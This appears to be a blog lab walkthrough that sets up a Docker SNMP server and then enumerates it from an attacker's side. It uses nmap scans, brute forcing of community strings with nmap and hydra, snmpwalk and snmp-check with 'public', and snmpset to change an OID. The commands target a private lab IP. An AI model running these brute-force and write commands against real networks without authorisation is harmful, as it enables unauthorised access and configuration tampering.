[Server:]
For the server side, install a SNMPd through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd
[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253
Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root 7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root 4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root 5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root 5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root 4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root 4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root 1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root 2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root 2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root 4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root 2003 Mar 10 12:52 snmp-win32-users.nse
Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253
Take a chance to try the community string, "public", by using SNMP Walking:
# snmpwalk -v 2c 192.168.0.253 -c public
More clearly understand the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public
Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"
No comments:
Post a Comment